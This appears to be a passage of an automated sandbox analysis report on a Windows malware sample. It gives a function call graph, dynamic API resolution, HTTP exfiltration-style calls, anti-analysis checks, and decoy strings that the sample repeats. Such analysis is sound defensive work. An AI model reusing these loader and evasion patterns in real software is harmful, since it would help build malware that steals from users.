37832->37833 37834 a338e3 37833->37834 37835 a34610 2 API calls 37834->37835 37836 a338fc 37835->37836 37837 a34610 2 API calls 37836->37837 37838 a33915 37837->37838 37839 a34610 2 API calls 37838->37839 37840 a3392e 37839->37840 37841 a34610 2 API calls 37840->37841 37842 a33947 37841->37842 37843 a34610 2 API calls 37842->37843 37844 a33960 37843->37844 37845 a34610 2 API calls 37844->37845 37846 a33979 37845->37846 37847 a34610 2 API calls 37846->37847 37848 a33992 37847->37848 37849 a34610 2 API calls 37848->37849 37850 a339ab 37849->37850 37851 a34610 2 API calls 37850->37851 37852 a339c4 37851->37852 37853 a34610 2 API calls 37852->37853 37854 a339dd 37853->37854 37855 a34610 2 API calls 37854->37855 37856 a339f6 37855->37856 37857 a34610 2 API calls 37856->37857 37858 a33a0f 37857->37858 37859 a34610 2 API calls 37858->37859 37860 a33a28 37859->37860 37861 a34610 2 API calls 37860->37861 37862 a33a41 37861->37862 37863 a34610 2 API calls 37862->37863 37864 a33a5a 37863->37864 37865 a34610 2 API calls 37864->37865 37866 a33a73 37865->37866 37867 a34610 2 API calls 37866->37867 37868 a33a8c 37867->37868 37869 a34610 2 API calls 37868->37869 37870 a33aa5 37869->37870 37871 a34610 2 API calls 37870->37871 37872 a33abe 37871->37872 37873 a34610 2 API calls 37872->37873 37874 a33ad7 37873->37874 37875 a34610 2 API calls 37874->37875 37876 a33af0 37875->37876 37877 a34610 2 API calls 37876->37877 37878 a33b09 37877->37878 37879 a34610 2 API calls 37878->37879 37880 a33b22 37879->37880 37881 a34610 2 API calls 37880->37881 37882 a33b3b 37881->37882 37883 a34610 2 API calls 37882->37883 37884 a33b54 37883->37884 37885 a34610 2 API calls 37884->37885 37886 a33b6d 37885->37886 37887 a34610 2 API calls 37886->37887 37888 a33b86 37887->37888 37889 a34610 2 API calls 37888->37889 37890 a33b9f 37889->37890 37891 a34610 2 API calls 37890->37891 37892 a33bb8 37891->37892 37893 a34610 2 API calls 37892->37893 37894 a33bd1 37893->37894 37895 a34610 2 API calls 37894->37895 37896 a33bea 37895->37896 37897 a34610 2 API calls 37896->37897 37898 a33c03 37897->37898 37899 a34610 2 API calls 37898->37899 37900 a33c1c 37899->37900 37901 a34610 2 API calls 37900->37901 37902 a33c35 37901->37902 37903 a34610 2 API calls 37902->37903 37904 a33c4e 37903->37904 37905 a34610 2 API calls 37904->37905 37906 a33c67 37905->37906 37907 a34610 2 API calls 37906->37907 37908 a33c80 37907->37908 37909 a34610 2 API calls 37908->37909 37910 a33c99 37909->37910 37911 a34610 2 API calls 37910->37911 37912 a33cb2 37911->37912 37913 a34610 2 API calls 37912->37913 37914 a33ccb 37913->37914 37915 a34610 2 API calls 37914->37915 37916 a33ce4 37915->37916 37917 a34610 2 API calls 37916->37917 37918 a33cfd 37917->37918 37919 a34610 2 API calls 37918->37919 37920 a33d16 37919->37920 37921 a34610 2 API calls 37920->37921 37922 a33d2f 37921->37922 37923 a34610 2 API calls 37922->37923 37924 a33d48 37923->37924 37925 a34610 2 API calls 37924->37925 37926 a33d61 37925->37926 37927 a34610 2 API calls 37926->37927 37928 a33d7a 37927->37928 37929 a34610 2 API calls 37928->37929 37930 a33d93 37929->37930 37931 a34610 2 API calls 37930->37931 37932 a33dac 37931->37932 37933 a34610 2 API calls 37932->37933 37934 a33dc5 37933->37934 37935 a34610 2 API calls 37934->37935 37936 a33dde 37935->37936 37937 a34610 2 API calls 37936->37937 37938 a33df7 37937->37938 37939 a34610 2 API calls 37938->37939 37940 a33e10 37939->37940 37941 a34610 2 API calls 37940->37941 37942 a33e29 37941->37942 37943 a34610 2 API calls 37942->37943 37944 a33e42 37943->37944 37945 a34610 2 API calls 37944->37945 37946 a33e5b 37945->37946 37947 a34610 2 API calls 37946->37947 37948 a33e74 37947->37948 37949 a34610 2 API calls 37948->37949 37950 a33e8d 37949->37950 37951 a34610 2 API calls 37950->37951 37952 a33ea6 37951->37952 37953 a34610 2 API calls 37952->37953 37954 a33ebf 37953->37954 37955 a34610 2 API calls 37954->37955 37956 a33ed8 37955->37956 37957 a34610 2 API calls 37956->37957 37958 a33ef1 37957->37958 37959 a34610 2 API calls 37958->37959 37960 a33f0a 37959->37960 37961 a34610 2 API calls 37960->37961 37962 a33f23 37961->37962 37963 a34610 2 API calls 37962->37963 37964 a33f3c 37963->37964 37965 a34610 2 API calls 37964->37965 37966 a33f55 37965->37966 37967 a34610 2 API calls 37966->37967 37968 a33f6e 37967->37968 37969 a34610 2 API calls 37968->37969 37970 a33f87 37969->37970 37971 a34610 2 API calls 37970->37971 37972 a33fa0 37971->37972 37973 a34610 2 API calls 37972->37973 37974 a33fb9 37973->37974 37975 a34610 2 API calls 37974->37975 37976 a33fd2 37975->37976 37977 a34610 2 API calls 37976->37977 37978 a33feb 37977->37978 37979 a34610 2 API calls 37978->37979 37980 a34004 37979->37980 37981 a34610 2 API calls 37980->37981 37982 a3401d 37981->37982 37983 a34610 2 API calls 37982->37983 37984 a34036 37983->37984 37985 a34610 2 API calls 37984->37985 37986 a3404f 37985->37986 37987 a34610 2 API calls 37986->37987 37988 a34068 37987->37988 37989 a34610 2 API calls 37988->37989 37990 a34081 37989->37990 37991 a34610 2 API calls 37990->37991 37992 a3409a 37991->37992 37993 a34610 2 API calls 37992->37993 37994 a340b3 37993->37994 37995 a34610 2 API calls 37994->37995 37996 a340cc 37995->37996 37997 a34610 2 API calls 37996->37997 37998 a340e5 37997->37998 37999 a34610 2 API calls 37998->37999 38000 a340fe 37999->38000 38001 a34610 2 API calls 38000->38001 38002 a34117 38001->38002 38003 a34610 2 API calls 38002->38003 38004 a34130 38003->38004 38005 a34610 2 API calls 38004->38005 38006 a34149 38005->38006 38007 a34610 2 API calls 38006->38007 38008 a34162 38007->38008 38009 a34610 2 API calls 38008->38009 38010 a3417b 38009->38010 38011 a34610 2 API calls 38010->38011 38012 a34194 38011->38012 38013 a34610 2 API calls 38012->38013 38014 a341ad 38013->38014 38015 a34610 2 API calls 38014->38015 38016 a341c6 38015->38016 38017 a34610 2 API calls 38016->38017 38018 a341df 38017->38018 38019 a34610 2 API calls 38018->38019 38020 a341f8 38019->38020 38021 a34610 2 API calls 38020->38021 38022 a34211 38021->38022 38023 a34610 2 API calls 38022->38023 38024 a3422a 38023->38024 38025 a34610 2 API calls 38024->38025 38026 a34243 38025->38026 38027 a34610 2 API calls 38026->38027 38028 a3425c 38027->38028 38029 a34610 2 API calls 38028->38029 38030 a34275 38029->38030 38031 a34610 2 API calls 38030->38031 38032 a3428e 38031->38032 38033 a34610 2 API calls 38032->38033 38034 a342a7 38033->38034 38035 a34610 2 API calls 38034->38035 38036 a342c0 38035->38036 38037 a34610 2 API calls 38036->38037 38038 a342d9 38037->38038 38039 a34610 2 API calls 38038->38039 38040 a342f2 38039->38040 38041 a34610 2 API calls 38040->38041 38042 a3430b 38041->38042 38043 a34610 2 API calls 38042->38043 38044 a34324 38043->38044 38045 a34610 2 API calls 38044->38045 38046 a3433d 38045->38046 38047 a34610 2 API calls 38046->38047 38048 a34356 38047->38048 38049 a34610 2 API calls 38048->38049 38050 a3436f 38049->38050 38051 a34610 2 API calls 38050->38051 38052 a34388 38051->38052 38053 a34610 2 API calls 38052->38053 38054 a343a1 38053->38054 38055 a34610 2 API calls 38054->38055 38056 a343ba 38055->38056 38057 a34610 2 API calls 38056->38057 38058 a343d3 38057->38058 38059 a34610 2 API calls 38058->38059 38060 a343ec 38059->38060 38061 a34610 2 API calls 38060->38061 38062 a34405 38061->38062 38063 a34610 2 API calls 38062->38063 38064 a3441e 38063->38064 38065 a34610 2 API calls 38064->38065 38066 a34437 38065->38066 38067 a34610 2 API calls 38066->38067 38068 a34450 38067->38068 38069 a34610 2 API calls 38068->38069 38070 a34469 38069->38070 38071 a34610 2 API calls 38070->38071 38072 a34482 38071->38072 38073 a34610 2 API calls 38072->38073 38074 a3449b 38073->38074 38075 a34610 2 API calls 38074->38075 38076 a344b4 38075->38076 38077 a34610 2 API calls 38076->38077 38078 a344cd 38077->38078 38079 a34610 2 API calls 38078->38079 38080 a344e6 38079->38080 38081 a34610 2 API calls 38080->38081 38082 a344ff 38081->38082 38083 a34610 2 API calls 38082->38083 38084 a34518 38083->38084 38085 a34610 2 API calls 38084->38085 38086 a34531 38085->38086 38087 a34610 2 API calls 38086->38087 38088 a3454a 38087->38088 38089 a34610 2 API calls 38088->38089 38090 a34563 38089->38090 38091 a34610 2 API calls 38090->38091 38092 a3457c 38091->38092 38093 a34610 2 API calls 38092->38093 38094 a34595 38093->38094 38095 a34610 2 API calls 38094->38095 38096 a345ae 38095->38096 38097 a34610 2 API calls 38096->38097 38098 a345c7 38097->38098 38099 a34610 2 API calls 38098->38099 38100 a345e0 38099->38100 38101 a34610 2 API calls 38100->38101 38102 a345f9 38101->38102 38103 a49f20 38102->38103 38104 a4a346 8 API calls 38103->38104 38105 a49f30 43 API calls 38103->38105 38106 a4a456 38104->38106 38107 a4a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38104->38107 38105->38104 38108 a4a526 38106->38108 38109 a4a463 8 API calls 38106->38109 38107->38106 38110 a4a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38108->38110 38111 a4a5a8 38108->38111 38109->38108 38110->38111 38112 a4a5b5 6 API calls 38111->38112 38113 a4a647 38111->38113 38112->38113 38114 a4a654 9 API calls 38113->38114 38115 a4a72f 38113->38115 38114->38115 38116 a4a7b2 38115->38116 38117 a4a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38115->38117 38118 a4a7ec 38116->38118 38119 a4a7bb GetProcAddress GetProcAddress 38116->38119 38117->38116 38120 a4a825 38118->38120 38121 a4a7f5 GetProcAddress GetProcAddress 38118->38121 38119->38118 38122 a4a922 38120->38122 38123 a4a832 10 API calls 38120->38123 38121->38120 38124 a4a98d 38122->38124 38125 a4a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38122->38125 38123->38122 38126 a4a996 GetProcAddress 38124->38126 38127 a4a9ae 38124->38127 38125->38124 38126->38127 38128 a4a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38127->38128 38129 a45ef3 38127->38129 38128->38129 38130 a31590 38129->38130 38400 a316b0 38130->38400 38133 a4aab0 lstrcpy 38134 a315b5 38133->38134 38135 a4aab0 lstrcpy 38134->38135 38136 a315c7 38135->38136 38137 a4aab0 lstrcpy 38136->38137 38138 a315d9 38137->38138 38139 a4aab0 lstrcpy 38138->38139 38140 a31663 38139->38140 38141 a45760 38140->38141 38142 a45771 38141->38142 38143 a4ab30 2 API calls 38142->38143 38144 a4577e 38143->38144 38145 a4ab30 2 API calls 38144->38145 38146 a4578b 38145->38146 38147 a4ab30 2 API calls 38146->38147 38148 a45798 38147->38148 38149 a4aa50 lstrcpy 38148->38149 38150 a457a5 38149->38150 38151 a4aa50 lstrcpy 38150->38151 38152 a457b2 38151->38152 38153 a4aa50 lstrcpy 38152->38153 38154 a457bf 38153->38154 38155 a4aa50 lstrcpy 38154->38155 38166 a457cc 38155->38166 38156 a4aa50 lstrcpy 38156->38166 38157 a4ab30 lstrlen lstrcpy 38157->38166 38158 a45893 StrCmpCA 38158->38166 38159 a458f0 StrCmpCA 38160 a45a2c 38159->38160 38159->38166 38161 a4abb0 lstrcpy 38160->38161 38162 a45a38 38161->38162 38163 a4ab30 2 API calls 38162->38163 38164 a45a46 38163->38164 38168 a4ab30 2 API calls 38164->38168 38165 a45aa6 StrCmpCA 38165->38166 38169 a45be1 38165->38169 38166->38156 38166->38157 38166->38158 38166->38159 38166->38165 38167 a45440 20 API calls 38166->38167 38171 a4abb0 lstrcpy 38166->38171 38177 a45c5b StrCmpCA 38166->38177 38178 a45510 25 API calls 38166->38178 38189 a459da StrCmpCA 38166->38189 38192 a4aab0 lstrcpy 38166->38192 38194 a45b8f StrCmpCA 38166->38194 38195 a31590 lstrcpy 38166->38195 38167->38166 38170 a45a55 38168->38170 38172 a4abb0 lstrcpy 38169->38172 38173 a316b0 lstrcpy 38170->38173 38171->38166 38174 a45bed 38172->38174 38193 a45a61 38173->38193 38175 a4ab30 2 API calls 38174->38175 38176 a45bfb 38175->38176 38179 a4ab30 2 API calls 38176->38179 38180 a45c66 Sleep 38177->38180 38181 a45c78 38177->38181 38178->38166 38182 a45c0a 38179->38182 38180->38166 38183 a4abb0 lstrcpy 38181->38183 38184 a316b0 lstrcpy 38182->38184 38185 a45c84 38183->38185 38184->38193 38186 a4ab30 2 API calls 38185->38186 38187 a45c93 38186->38187 38188 a4ab30 2 API calls 38187->38188 38190 a45ca2 38188->38190 38189->38166 38191 a316b0 lstrcpy 38190->38191 38191->38193 38192->38166 38193->37248 38194->38166 38195->38166 38197 a476e3 GetVolumeInformationA 38196->38197 38198 a476dc 38196->38198 38202 a47721 38197->38202 38198->38197 38199 a4778c GetProcessHeap RtlAllocateHeap 38200 a477b8 wsprintfA 38199->38200 38201 a477a9 38199->38201 38204 a4aa50 lstrcpy 38200->38204 38203 a4aa50 lstrcpy 38201->38203 38202->38199 38205 a45ff7 38203->38205 38204->38205 38205->37269 38207 a4aab0 lstrcpy 38206->38207 38208 a348e9 38207->38208 38409 a34800 38208->38409 38210 a348f5 38211 a4aa50 lstrcpy 38210->38211 38212 a34927 38211->38212 38213 a4aa50 lstrcpy 38212->38213 38214 a34934 38213->38214 38215 a4aa50 lstrcpy 38214->38215 38216 a34941 38215->38216 38217 a4aa50 lstrcpy 38216->38217 38218 a3494e 38217->38218 38219 a4aa50 lstrcpy 38218->38219 38220 a3495b InternetOpenA StrCmpCA 38219->38220 38221 a34994 38220->38221 38222 a34f1b InternetCloseHandle 38221->38222 38415 a48cf0 38221->38415 38224 a34f38 38222->38224 38430 a3a210 CryptStringToBinaryA 38224->38430 38225 a349b3 38423 a4ac30 38225->38423 38228 a349c6 38230 a4abb0 lstrcpy 38228->38230 38236 a349cf 38230->38236 38231 a4ab30 2 API calls 38232 a34f55 38231->38232 38234 a4acc0 4 API calls 38232->38234 38233 a34f77 ctype 38238 a4aab0 lstrcpy 38233->38238 38235 a34f6b 38234->38235 38237 a4abb0 lstrcpy 38235->38237 38239 a4acc0 4 API calls 38236->38239 38237->38233 38250 a34fa7 38238->38250 38240 a349f9 38239->38240 38241 a4abb0 lstrcpy 38240->38241 38242 a34a02 38241->38242 38243 a4acc0 4 API calls 38242->38243 38244 a34a21 38243->38244 38245 a4abb0 lstrcpy 38244->38245 38246 a34a2a 38245->38246 38247 a4ac30 3 API calls 38246->38247 38248 a34a48 38247->38248 38249 a4abb0 lstrcpy 38248->38249 38251 a34a51 38249->38251 38250->37272 38252 a4acc0 4 API calls 38251->38252 38253 a34a70 38252->38253 38254 a4abb0 lstrcpy 38253->38254 38255 a34a79 38254->38255 38256 a4acc0 4 API calls 38255->38256 38257 a34a98 38256->38257 38258 a4abb0 lstrcpy 38257->38258 38259 a34aa1 38258->38259 38260 a4acc0 4 API calls 38259->38260 38261 a34acd 38260->38261 38262 a4ac30 3 API calls 38261->38262 38263 a34ad4 38262->38263 38264 a4abb0 lstrcpy 38263->38264 38265 a34add 38264->38265 38266 a34af3 InternetConnectA 38265->38266 38266->38222 38267 a34b23 HttpOpenRequestA 38266->38267 38269 a34b78 38267->38269 38270 a34f0e InternetCloseHandle 38267->38270 38271 a4acc0 4 API calls 38269->38271 38270->38222 38272 a34b8c 38271->38272 38273 a4abb0 lstrcpy 38272->38273 38274 a34b95 38273->38274 38275 a4ac30 3 API calls 38274->38275 38276 a34bb3 38275->38276 38277 a4abb0 lstrcpy 38276->38277 38278 a34bbc 38277->38278 38279 a4acc0 4 API calls 38278->38279 38280 a34bdb 38279->38280 38281 a4abb0 lstrcpy 38280->38281 38282 a34be4 38281->38282 38283 a4acc0 4 API calls 38282->38283 38284 a34c05 38283->38284 38285 a4abb0 lstrcpy 38284->38285 38286 a34c0e 38285->38286 38287 a4acc0 4 API calls 38286->38287 38288 a34c2e 38287->38288 38289 a4abb0 lstrcpy 38288->38289 38290 a34c37 38289->38290 38291 a4acc0 4 API calls 38290->38291 38292 a34c56 38291->38292 38293 a4abb0 lstrcpy 38292->38293 38294 a34c5f 38293->38294 38295 a4ac30 3 API calls 38294->38295 38296 a34c7d 38295->38296 38297 a4abb0 lstrcpy 38296->38297 38298 a34c86 38297->38298 38299 a4acc0 4 API calls 38298->38299 38300 a34ca5 38299->38300 38301 a4abb0 lstrcpy 38300->38301 38302 a34cae 38301->38302 38303 a4acc0 4 API calls 38302->38303 38304 a34ccd 38303->38304 38305 a4abb0 lstrcpy 38304->38305 38306 a34cd6 38305->38306 38307 a4ac30 3 API calls 38306->38307 38308 a34cf4 38307->38308 38309 a4abb0 lstrcpy 38308->38309 38310 a34cfd 38309->38310 38311 a4acc0 4 API calls 38310->38311 38312 a34d1c 38311->38312 38313 a4abb0 lstrcpy 38312->38313 38314 a34d25 38313->38314 38315 a4acc0 4 API calls 38314->38315 38316 a34d46 38315->38316 38317 a4abb0 lstrcpy 38316->38317 38318 a34d4f 38317->38318 38319 a4acc0 4 API calls 38318->38319 38320 a34d6f 38319->38320 38321 a4abb0 lstrcpy 38320->38321 38322 a34d78 38321->38322 38323 a4acc0 4 API calls 38322->38323 38324 a34d97 38323->38324 38325 a4abb0 lstrcpy 38324->38325 38326 a34da0 38325->38326 38327 a4ac30 3 API calls 38326->38327 38328 a34dbe 38327->38328 38329 a4abb0 lstrcpy 38328->38329 38330 a34dc7 38329->38330 38331 a4aa50 lstrcpy 38330->38331 38332 a34de2 38331->38332 38333 a4ac30 3 API calls 38332->38333 38334 a34e03 38333->38334 38335 a4ac30 3 API calls 38334->38335 38336 a34e0a 38335->38336 38337 a4abb0 lstrcpy 38336->38337 38338 a34e16 38337->38338 38339 a34e37 lstrlen 38338->38339 38340 a34e4a 38339->38340 38341 a34e53 lstrlen 38340->38341 38429 a4ade0 38341->38429 38343 a34e63 HttpSendRequestA 38344 a34e82 InternetReadFile 38343->38344 38345 a34eb7 InternetCloseHandle 38344->38345 38350 a34eae 38344->38350 38347 a4ab10 38345->38347 38347->38270 38348 a4acc0 4 API calls 38348->38350 38349 a4abb0 lstrcpy 38349->38350 38350->38344 38350->38345 38350->38348 38350->38349 38436 a4ade0 38351->38436 38353 a41a14 StrCmpCA 38354 a41a1f ExitProcess 38353->38354 38356 a41a27 38353->38356 38355 a41c12 38355->37274 38356->38355 38357 a41bc0 StrCmpCA 38356->38357 38358 a41b41 StrCmpCA 38356->38358 38359 a41ba1 StrCmpCA 38356->38359 38360 a41b82 StrCmpCA 38356->38360 38361 a41b63 StrCmpCA 38356->38361 38362 a41aad StrCmpCA 38356->38362 38363 a41acf StrCmpCA 38356->38363 38364 a41afd StrCmpCA 38356->38364 38365 a41b1f StrCmpCA 38356->38365 38366 a4ab30 lstrlen lstrcpy 38356->38366 38357->38356 38358->38356 38359->38356 38360->38356 38361->38356 38362->38356 38363->38356 38364->38356 38365->38356 38366->38356 38367->37280 38368->37282 38369->37288 38370->37290 38371->37296 38372->37298 38373->37302 38374->37306 38375->37310 38376->37316 38377->37318 38378->37322 38379->37336 38380->37340 38381->37339 38382->37335 38383->37339 38384->37355 38385->37371 38386->37343 38387->37347 38388->37366 38389->37374 38390->37378 38391->37367 38392->37368 38393->37393 38394->37397 38395->37396 38396->37392 38397->37396 38398->37406 38401 a4aab0 lstrcpy 38400->38401 38402 a316c3 38401->38402 38403 a4aab0 lstrcpy 38402->38403 38404 a316d5 38403->38404 38405 a4aab0 lstrcpy 38404->38405 38406 a316e7 38405->38406 38407 a4aab0 lstrcpy 38406->38407 38408 a315a3 38407->38408 38408->38133 38410 a34816 38409->38410 38411 a34888 lstrlen 38410->38411 38435 a4ade0 38411->38435 38413 a34898 InternetCrackUrlA 38414 a348b7 38413->38414 38414->38210 38416 a4aa50 lstrcpy 38415->38416 38417 a48d04 38416->38417 38418 a4aa50 lstrcpy 38417->38418 38419 a48d12 GetSystemTime 38418->38419 38421 a48d29 38419->38421 38420 a4aab0 lstrcpy 38422 a48d8c 38420->38422 38421->38420 38422->38225 38425 a4ac41 38423->38425 38424 a4ac98 38426 a4aab0 lstrcpy 38424->38426 38425->38424 38427 a4ac78 lstrcpy lstrcat 38425->38427 38428 a4aca4 38426->38428 38427->38424 38428->38228 38429->38343 38431 a34f3e 38430->38431 38432 a3a249 LocalAlloc 38430->38432 38431->38231 38431->38233 38432->38431 38433 a3a264 CryptStringToBinaryA 38432->38433 38433->38431 38434 a3a289 LocalFree 38433->38434 38434->38431 38435->38413 38436->38353

                                      Executed Functions

                                      Function 00A49BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 a49bb0-a49bc4 call a49aa0 663 a49de3-a49e42 LoadLibraryA * 5 660->663 664 a49bca-a49dde call a49ad0 GetProcAddress * 21 660->664 666 a49e44-a49e58 GetProcAddress 663->666 667 a49e5d-a49e64 663->667 664->663 666->667 669 a49e96-a49e9d 667->669 670 a49e66-a49e91 GetProcAddress * 2 667->670 671 a49e9f-a49eb3 GetProcAddress 669->671 672 a49eb8-a49ebf 669->672 670->669 671->672 673 a49ec1-a49ed4 GetProcAddress 672->673 674 a49ed9-a49ee0 672->674 673->674 675 a49f11-a49f12 674->675 676 a49ee2-a49f0c GetProcAddress * 2 674->676 676->675
                                      APIs
                                      • GetProcAddress.KERNEL32(77190000,013117C8), ref: 00A49BF1
                                      • GetProcAddress.KERNEL32(77190000,013116A8), ref: 00A49C0A
                                      • GetProcAddress.KERNEL32(77190000,01311768), ref: 00A49C22
                                      • GetProcAddress.KERNEL32(77190000,013116C0), ref: 00A49C3A
                                      • GetProcAddress.KERNEL32(77190000,01311750), ref: 00A49C53
                                      • GetProcAddress.KERNEL32(77190000,01318B08), ref: 00A49C6B
                                      • GetProcAddress.KERNEL32(77190000,013056C8), ref: 00A49C83
                                      • GetProcAddress.KERNEL32(77190000,013054C8), ref: 00A49C9C
                                      • GetProcAddress.KERNEL32(77190000,013117B0), ref: 00A49CB4
                                      • GetProcAddress.KERNEL32(77190000,013114F8), ref: 00A49CCC
                                      • GetProcAddress.KERNEL32(77190000,013116D8), ref: 00A49CE5
                                      • GetProcAddress.KERNEL32(77190000,01311708), ref: 00A49CFD
                                      • GetProcAddress.KERNEL32(77190000,01305568), ref: 00A49D15
                                      • GetProcAddress.KERNEL32(77190000,01311588), ref: 00A49D2E
                                      • GetProcAddress.KERNEL32(77190000,013115A0), ref: 00A49D46
                                      • GetProcAddress.KERNEL32(77190000,01305428), ref: 00A49D5E
                                      • GetProcAddress.KERNEL32(77190000,013115D0), ref: 00A49D77
                                      • GetProcAddress.KERNEL32(77190000,01311738), ref: 00A49D8F
                                      • GetProcAddress.KERNEL32(77190000,013056E8), ref: 00A49DA7
                                      • GetProcAddress.KERNEL32(77190000,01311810), ref: 00A49DC0
                                      • GetProcAddress.KERNEL32(77190000,013054A8), ref: 00A49DD8
                                      • LoadLibraryA.KERNEL32(01311888,?,00A46CA0), ref: 00A49DEA
                                      • LoadLibraryA.KERNEL32(01311828,?,00A46CA0), ref: 00A49DFB
                                      • LoadLibraryA.KERNEL32(01311858,?,00A46CA0), ref: 00A49E0D
                                      • LoadLibraryA.KERNEL32(01311870,?,00A46CA0), ref: 00A49E1F
                                      • LoadLibraryA.KERNEL32(013118B8,?,00A46CA0), ref: 00A49E30
                                      • GetProcAddress.KERNEL32(76850000,01311840), ref: 00A49E52
                                      • GetProcAddress.KERNEL32(77040000,013118A0), ref: 00A49E73
                                      • GetProcAddress.KERNEL32(77040000,013117F8), ref: 00A49E8B
                                      • GetProcAddress.KERNEL32(75A10000,01318DF8), ref: 00A49EAD
                                      • GetProcAddress.KERNEL32(75690000,01305608), ref: 00A49ECE
                                      • GetProcAddress.KERNEL32(776F0000,01318C28), ref: 00A49EEF
                                      • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A49F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00A49EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 4af79b33590152e8245f462c50020a5238720bd6231e6dac1f7b6ddc43560ea9
                                      • Instruction ID: db818aa8ca9453892e452e8bedc50c5c7285af0a2f1d4cec48256b7af6c0e181
                                      • Opcode Fuzzy Hash: 4af79b33590152e8245f462c50020a5238720bd6231e6dac1f7b6ddc43560ea9
                                      • Instruction Fuzzy Hash: 35A10BB5A183009FD344DFA9EC88B567BA9A74D701B10961AB90DCB3B0D634B950CBB5
                                      Function 00A34610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 a34610-a346e5 RtlAllocateHeap 781 a346f0-a346f6 764->781 782 a3479f-a347f9 VirtualProtect 781->782 783 a346fc-a3479a 781->783 783->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A3465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A347EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A347CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34784
